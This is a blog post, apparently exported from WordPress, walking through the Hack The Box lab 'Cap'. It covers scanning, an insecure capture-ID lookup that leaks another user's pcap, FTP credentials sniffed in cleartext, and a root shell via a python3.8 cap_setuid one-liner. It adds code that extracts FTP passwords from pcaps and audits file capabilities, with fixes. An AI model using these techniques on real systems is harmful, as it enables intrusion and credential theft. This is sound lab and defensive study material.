{"id":1575,"date":"2021-09-30T22:47:32","date_gmt":"2021-09-30T22:47:32","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1575"},"modified":"2021-09-30T22:47:32","modified_gmt":"2021-09-30T22:47:32","slug":"cap","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/30\/cap\/","title":{"rendered":"Cap"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Difficulty<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Cap\" title=\"Cap\">Cap<\/a> - HTB<\/td>\n<td>Easy<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/70ea3357a2d090af11a0953ec8717e90.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap scan:<\/p>\n<pre><code class=\"language-sh\">PORT   STATE SERVICE VERSION\n21\/tcp open  ftp     vsftpd 3.0.3\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey:\n|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)\n|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)\n|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)\n80\/tcp open  http    gunicorn<\/code><\/pre>\n<p>Three services: FTP (vsftpd 3.0.3), SSH, and an HTTP server identifying itself as gunicorn, a Python WSGI server, so the web application is Python. Port 80 served a simple page that ran a few commands in the background and showed their output to the user. I suspected the output was being fetched with AJAX calls and analysed the traffic in Burp, but found nothing. A directory scan came next; nothing unexpected showed up:<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# gobuster dir  --expanded --follow-redirect --url http:\/\/10.10.10.245\/ --no-error -t 50 --extensions php,txt,html --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt --timeout 40s\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.245\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              html,php,txt\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 40s\n===============================================================\n2021\/09\/30 17:32:56 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.245\/data                 (Status: 200) [Size: 19386]\nhttp:\/\/10.10.10.245\/ip                   (Status: 200) [Size: 17376]\nhttp:\/\/10.10.10.245\/netstat              (Status: 200) [Size: 41264]\nhttp:\/\/10.10.10.245\/capture              (Status: 200) [Size: 19386]<\/code><\/pre>\n<p>Visiting \/capture redirected me to pages such as \/data\/1, \/data\/2 and \/data\/3, each serving a pcap file with a TCP dump of the requests I had just made; nothing useful was in them. The capture id is nothing more than a sequential integer in the URL, so ids the application never handed to me are worth trying. I kept fuzzing \/data with a wordlist of integers (sayi), excluding responses of length 19386, the size of the generic page that \/data itself returns.<\/p>\n
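<p>A capture id that is a plain integer, looked up without checking who it belongs to, is an insecure direct object reference: whoever can guess an id gets the file. As an added example (not the Cap application's code; CaptureStore and its methods are hypothetical names and the pcap bytes are placeholders), the following models that download handler next to a fixed one that checks ownership on every lookup and issues unguessable ids for new captures:<\/p>
```python
# Added example, not the Cap application's code: a model of the /data/<id>
# capture download with the flaw the walkthrough exploits beside a fixed
# handler. CaptureStore and its methods are hypothetical names; the pcap
# contents are placeholder bytes constructed here.
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional


@dataclass
class Capture:
    owner: str      # the user whose session started the capture
    pcap: bytes     # placeholder content


@dataclass
class CaptureStore:
    by_id: Dict[str, Capture] = field(default_factory=dict)
    next_id: int = 0

    def add_sequential(self, owner: str, pcap: bytes) -> str:
        '''As observed on the box: ids are 0, 1, 2, ... so a wordlist of integers walks them all.'''
        cid = str(self.next_id)
        self.next_id += 1
        self.by_id[cid] = Capture(owner, pcap)
        return cid

    def add_random(self, owner: str, pcap: bytes) -> str:
        '''Hardened: a 128-bit random id, so guessing someone else's capture is infeasible.'''
        cid = secrets.token_urlsafe(16)
        self.by_id[cid] = Capture(owner, pcap)
        return cid

    def data_vulnerable(self, requester: str, cid: str) -> Optional[bytes]:
        '''/data/<id> as found: the id alone selects the file; the requester is ignored.'''
        cap = self.by_id.get(cid)
        return cap.pcap if cap else None

    def data_fixed(self, requester: str, cid: str) -> Optional[bytes]:
        '''Ownership check on every lookup. Missing and foreign ids both return None
        (a 404), so the response does not confirm that another user's id exists.'''
        cap = self.by_id.get(cid)
        if cap is None or cap.owner != requester:
            return None
        return cap.pcap


def demo() -> Dict[str, object]:
    '''An earlier capture by another user (id 0) and the attacker's own (id 1).'''
    store = CaptureStore()
    other = store.add_sequential('other-user', b'constructed: earlier FTP session')
    mine = store.add_sequential('attacker', b'constructed: my own requests')
    return {
        'leaked': store.data_vulnerable('attacker', str(int(mine) - 1)),   # walks down to id 0
        'denied': store.data_fixed('attacker', other),
        'own': store.data_fixed('attacker', mine),
        'random_id_len': len(store.add_random('other-user', b'constructed')),
    }


if __name__ == '__main__':
    print(demo())
```
<p>Random ids alone are not the fix: a leaked URL would still be usable by anyone, which is why data_fixed keeps the ownership check even when the id is unguessable.<\/p>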
<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# gobuster dir  --expanded --follow-redirect --url http:\/\/10.10.10.245\/data\/ --no-error -t 50 --wordlist sayi --exclude-length 19386\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.245\/data\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                sayi\n[+] Negative Status codes:   404\n[+] Exclude Length:          19386\n[+] User Agent:              gobuster\/3.1.0\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/09\/30 18:07:53 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.245\/data\/1                    (Status: 200) [Size: 17144]\nhttp:\/\/10.10.10.245\/data\/3                    (Status: 200) [Size: 17144]\nhttp:\/\/10.10.10.245\/data\/2                    (Status: 200) [Size: 17144]\nhttp:\/\/10.10.10.245\/data\/0                    (Status: 200) [Size: 17147]\n\n===============================================================\n2021\/09\/30 18:09:35 Finished\n===============================================================\n<\/code><\/pre>\n<p>\/data\/0 was an id the application had never shown me, and it turned out to be a static file: a capture left behind by someone else's session, served to me without any ownership check. Opening it in Wireshark revealed an FTP session, and because FTP sends USER and PASS in cleartext the credentials were readable directly in the stream (Follow TCP Stream on port 21). The same password was reused for SSH, so I logged in with it and read the first flag.<\/p>\n
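<p>What Follow TCP Stream shows in Wireshark can also be pulled out programmatically, which matters once there are dozens of captures to sift through. The following is an added example, not part of the original post: a small reader for classic pcap files that pairs each FTP USER with the PASS that follows it on the same client connection. The embedded capture is constructed for the example; the user name is the one from this walkthrough, the password is a placeholder.<\/p>
```python
# Added example, not part of the original post: a minimal reader for classic
# pcap files that pulls FTP USER/PASS commands out of the port-21 stream, which
# is what "Follow TCP Stream" shows in Wireshark. The capture below is
# constructed here; the user name is the one from the walkthrough, the
# password is a placeholder, not the machine's.
import struct
from typing import Iterator, List, Tuple

PCAP_MAGIC_LE = 0xA1B2C3D4   # magic as read with '<I' from a little-endian file
PCAP_MAGIC_BE = 0xD4C3B2A1   # the same magic seen through '<I' when the file is big-endian
LINKTYPE_ETHERNET = 1

CLIENT = (bytes([10, 10, 14, 7]), 49152)     # constructed addresses
SERVER = (bytes([10, 10, 10, 245]), 21)


def _frame(src: Tuple[bytes, int], dst: Tuple[bytes, int], payload: bytes) -> bytes:
    '''Build one Ethernet/IPv4/TCP frame (constructed test data; checksums left zero).'''
    eth = b'\x00' * 12 + b'\x08\x00'                                   # ethertype IPv4
    ip = struct.pack('!BBHHHBBH4s4s', 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0, src[0], dst[0])
    tcp = struct.pack('!HHIIBBHHH', src[1], dst[1], 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_sample_pcap() -> bytes:
    '''A four-packet FTP login, wrapped in the pcap global and per-packet headers.'''
    frames = [
        _frame(SERVER, CLIENT, b'220 (vsFTPd 3.0.3)\r\n'),
        _frame(CLIENT, SERVER, b'USER nathan\r\n'),
        _frame(SERVER, CLIENT, b'331 Please specify the password.\r\n'),
        _frame(CLIENT, SERVER, b'PASS example-password\r\n'),          # placeholder secret
    ]
    out = struct.pack('<IHHiIII', PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        out += struct.pack('<IIII', 1622100000 + i, 0, len(f), len(f)) + f
    return out


def iter_tcp_segments(pcap: bytes) -> Iterator[Tuple[str, int, str, int, bytes]]:
    '''Yield (src_ip, src_port, dst_ip, dst_port, payload) for every TCP segment carrying data.'''
    (magic,) = struct.unpack('<I', pcap[:4])
    if magic == PCAP_MAGIC_LE:
        end = '<'
    elif magic == PCAP_MAGIC_BE:
        end = '>'
    else:
        raise ValueError('not a classic pcap file (pcapng is not handled here)')
    (linktype,) = struct.unpack(end + 'I', pcap[20:24])
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f'unsupported link type {linktype}')
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(end + 'IIII', pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b'\x08\x00' or frame[23] != 6:
            continue                                                   # not IPv4 over TCP
        ihl = (frame[14] & 0x0F) * 4
        src_ip = '.'.join(map(str, frame[26:30]))
        dst_ip = '.'.join(map(str, frame[30:34]))
        tcp = frame[14 + ihl:]
        if len(tcp) < 20:
            continue
        src_port, dst_port = struct.unpack('!HH', tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield src_ip, src_port, dst_ip, dst_port, payload


def extract_ftp_credentials(pcap: bytes) -> List[Tuple[str, str, str]]:
    '''Pair each USER with the PASS that follows it on the same client connection.'''
    pending = {}
    found = []
    for src_ip, src_port, dst_ip, dst_port, payload in iter_tcp_segments(pcap):
        if dst_port != 21:
            continue
        for line in payload.split(b'\r\n'):
            if line.startswith(b'USER '):
                pending[(src_ip, src_port)] = line[5:].decode(errors='replace')
            elif line.startswith(b'PASS '):
                user = pending.pop((src_ip, src_port), None)
                found.append((dst_ip, user, line[5:].decode(errors='replace')))
    return found


if __name__ == '__main__':
    for host, user, password in extract_ftp_credentials(build_sample_pcap()):
        print(f'{host}: {user} / {password}')
```
<p>The reader handles only the classic pcap format and Ethernet link type; Wireshark's default save format is pcapng, so export as pcap first or convert with editcap.<\/p>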
<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ssh nathan@10.10.10.245\nnathan@10.10.10.245&#039;s password:\nWelcome to Ubuntu 20.04.2 LTS (GNU\/Linux 5.4.0-80-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n System information disabled due to load higher than 2.0\n\n * Super-optimized for small spaces - read how we shrank the memory\n   footprint of MicroK8s to make it the smallest full K8s around.\n\n   https:\/\/ubuntu.com\/blog\/microk8s-memory-optimisation\n\n63 updates can be applied immediately.\n42 of these updates are standard security updates.\nTo see these additional updates run: apt list --upgradable\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nLast login: Thu May 27 11:21:27 2021 from 10.10.14.7\nnathan@cap:~$ alias ls=&quot;ls -al&quot;\nnathan@cap:~$ ls\ntotal 28\ndrwxr-xr-x 3 nathan nathan 4096 May 27 09:16 .\ndrwxr-xr-x 3 root   root   4096 May 23 19:17 ..\nlrwxrwxrwx 1 root   root      9 May 15 21:40 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 nathan nathan  220 Feb 25  2020 .bash_logout\n-rw-r--r-- 1 nathan nathan 3771 Feb 25  2020 .bashrc\ndrwx------ 2 nathan nathan 4096 May 23 19:17 .cache\n-rw-r--r-- 1 nathan nathan  807 Feb 25  2020 .profile\nlrwxrwxrwx 1 root   root      9 May 27 09:16 .viminfo -&gt; \/dev\/null\n-r-------- 1 nathan nathan   33 Sep 30 22:02 user.txt\nnathan@cap:~$ cat user.txt\na858********************<\/code><\/pre>\n<p>I then uploaded linPEAS and continued enumerating. 
It turned up the interesting result below.<\/p>\n<pre><code class=\"language-sh\">\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Capabilities\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#capabilities\nCurrent capabilities:\nCurrent: =\nCapInh:   0000000000000000\nCapPrm:   0000000000000000\nCapEff:   0000000000000000\nCapBnd:   0000003fffffffff\nCapAmb:   0000000000000000\n\nShell capabilities:\n0x0000000000000000=\nCapInh:   0000000000000000\nCapPrm:   0000000000000000\nCapEff:   0000000000000000\nCapBnd:   0000003fffffffff\nCapAmb:   0000000000000000\n\nFiles with capabilities (limited to 50):\n\/usr\/bin\/python3.8 = cap_setuid,cap_net_bind_service+eip\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/traceroute6.iputils = cap_net_raw+ep\n\/usr\/bin\/mtr-packet = cap_net_raw+ep\n\/usr\/lib\/x86_64-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep<\/code><\/pre>\n<p>The shell itself holds no capabilities (CapPrm and CapEff are zero); what matters is the file capability on \/usr\/bin\/python3.8. cap_setuid sits in its permitted set with the effective flag (the +eip), so any local user who can execute that interpreter can call setuid(0) and spawn a root shell, with no SUID bit and no sudo involved. The other entries (cap_net_raw on ping, traceroute6 and mtr-packet) are the usual package defaults for raw-socket tools. <a href=\"https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation\/linux-capabilities#capabilities\">https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation\/linux-capabilities#capabilities<\/a> explains how to exploit this, and I exploited it directly. The remediation is equally direct: an interpreter should never carry cap_setuid, and setcap -r \/usr\/bin\/python3.8 removes it.<\/p>\n
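<p>linPEAS, like getcap -r, builds that list by reading the security.capability extended attribute of each file. As an added example that is not part of the original post, the following decodes that attribute (struct vfs_cap_data, revisions 1 to 3), renders it in getcap's notation, and flags the capabilities that are root-equivalent when they sit on an interpreter. The two sample attribute values are constructed to match the python3.8 and ping lines above; scan_file_caps is a hypothetical helper name that touches real files only if you call it, on Linux.<\/p>
```python
# Added example, not from the original post: decode the security.capability
# extended attribute that getcap and linPEAS read, render it in getcap's
# notation, and flag file capabilities that hand any local user a root shell.
# The two xattr byte strings below are constructed to match the linPEAS lines
# for /usr/bin/python3.8 and /usr/bin/ping; nothing is read from disk unless
# scan_file_caps() is called.
import os
import struct
from typing import Dict, Iterable, List, Tuple

VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001
CAP_U32_WORDS = {0x01000000: 1, 0x02000000: 2, 0x03000000: 2}   # revision -> (permitted, inheritable) pairs

# Linux capability numbers 0..40 (include/uapi/linux/capability.h), lowercased as getcap prints them.
CAP_NAMES = (
    'cap_chown', 'cap_dac_override', 'cap_dac_read_search', 'cap_fowner', 'cap_fsetid',
    'cap_kill', 'cap_setgid', 'cap_setuid', 'cap_setpcap', 'cap_linux_immutable',
    'cap_net_bind_service', 'cap_net_broadcast', 'cap_net_admin', 'cap_net_raw',
    'cap_ipc_lock', 'cap_ipc_owner', 'cap_sys_module', 'cap_sys_rawio', 'cap_sys_chroot',
    'cap_sys_ptrace', 'cap_sys_pacct', 'cap_sys_admin', 'cap_sys_boot', 'cap_sys_nice',
    'cap_sys_resource', 'cap_sys_time', 'cap_sys_tty_config', 'cap_mknod', 'cap_lease',
    'cap_audit_write', 'cap_audit_control', 'cap_setfcap', 'cap_mac_override',
    'cap_mac_admin', 'cap_syslog', 'cap_wake_alarm', 'cap_block_suspend', 'cap_audit_read',
    'cap_perfmon', 'cap_bpf', 'cap_checkpoint_restore',
)
# Capabilities that are root-equivalent on an interpreter or other general-purpose binary.
ROOT_EQUIVALENT = {'cap_setuid', 'cap_setgid', 'cap_sys_admin', 'cap_sys_ptrace',
                   'cap_sys_module', 'cap_dac_override', 'cap_dac_read_search',
                   'cap_chown', 'cap_fowner', 'cap_setfcap'}

# Constructed xattr values: revision 2 with the effective flag, then (permitted, inheritable) x 2.
SAMPLE_PYTHON38_XATTR = struct.pack('<IIIII', 0x02000001, (1 << 7) | (1 << 10), (1 << 7) | (1 << 10), 0, 0)
SAMPLE_PING_XATTR = struct.pack('<IIIII', 0x02000001, 1 << 13, 0, 0, 0)


def decode_vfs_caps(raw: bytes) -> Dict[str, object]:
    '''Parse struct vfs_cap_data (little-endian on disk) from a security.capability value.'''
    (magic_etc,) = struct.unpack('<I', raw[:4])
    rev = magic_etc & VFS_CAP_REVISION_MASK
    words = CAP_U32_WORDS.get(rev)
    if words is None:
        raise ValueError(f'unknown vfs cap revision {rev:#x}')
    permitted = inheritable = 0
    for i in range(words):
        p, ih = struct.unpack('<II', raw[4 + 8 * i:12 + 8 * i])
        permitted |= p << (32 * i)
        inheritable |= ih << (32 * i)
    # revision 3 appends the user-namespace root id the capabilities are valid for
    rootid = struct.unpack('<I', raw[4 + 8 * words:8 + 8 * words])[0] if rev == 0x03000000 else 0
    # a single flag: on exec, every permitted/inheritable cap also becomes effective
    effective = (permitted | inheritable) if magic_etc & VFS_CAP_FLAGS_EFFECTIVE else 0
    groups: Dict[str, List[str]] = {}
    for bit, name in enumerate(CAP_NAMES):
        flags = ''.join(f for f, mask in (('e', effective), ('i', inheritable), ('p', permitted))
                        if mask >> bit & 1)
        if flags:
            groups.setdefault(flags, []).append(name)
    text = ' '.join(f"{','.join(names)}+{flags}" for flags, names in groups.items())
    dangerous = [name for bit, name in enumerate(CAP_NAMES)
                 if name in ROOT_EQUIVALENT and permitted >> bit & 1]
    return {'revision': rev >> 24, 'rootid': rootid, 'permitted': permitted,
            'inheritable': inheritable, 'effective': effective, 'text': text, 'dangerous': dangerous}


def scan_file_caps(paths: Iterable[str]) -> List[Tuple[str, str, List[str]]]:
    '''getcap -r in Python: (path, getcap text, root-equivalent caps) for each file carrying caps.'''
    results = []
    for path in paths:
        try:
            raw = os.getxattr(path, 'security.capability')   # Linux only
        except OSError:        # ENODATA: no caps; also ENOTSUP, EACCES or a missing file
            continue
        info = decode_vfs_caps(raw)
        results.append((path, info['text'], info['dangerous']))
    return results


if __name__ == '__main__':
    for path, text, danger in scan_file_caps(os.path.join('/usr/bin', f) for f in os.listdir('/usr/bin')):
        print(f'{path} = {text}' + (f'   <-- root-equivalent: {danger}' if danger else ''))
```
<p>The getcap-style string is an approximation of libcap's cap_to_text output that is exact for the common single-group cases shown by linPEAS here; the decoded sets are what a detection rule or a hardening audit should key on.<\/p>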
<pre><code class=\"language-sh\">nathan@cap:\/tmp$ \/usr\/bin\/python3.8 -c &#039;import os; os.setuid(0); os.system(&quot;\/bin\/bash&quot;);&#039;\nroot@cap:\/tmp# cd \/root\nroot@cap:\/root# ls\nroot.txt  snap\nroot@cap:\/root# cat root.txt\nbe696caaa****************<\/code><\/pre>\n<p>This machine matters to me because it had not yet been retired when I did it, which is why the flags are starred out.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Difficulty OS Logo Cap &#8211; HTB Easy Linux Walkthrough nmap scan: PORT STATE SERVICE VERSION 21\/tcp open ftp vsftpd 3.0.3 22\/tcp open ssh&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/30\/cap\/\">Read more<span 
class=\"screen-reader-text\">Cap<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1575","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1575","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1575"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1575\/revisions"}],"predecessor-version":[{"id":1576,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1575\/revisions\/1576"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1575"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1575"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1575"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}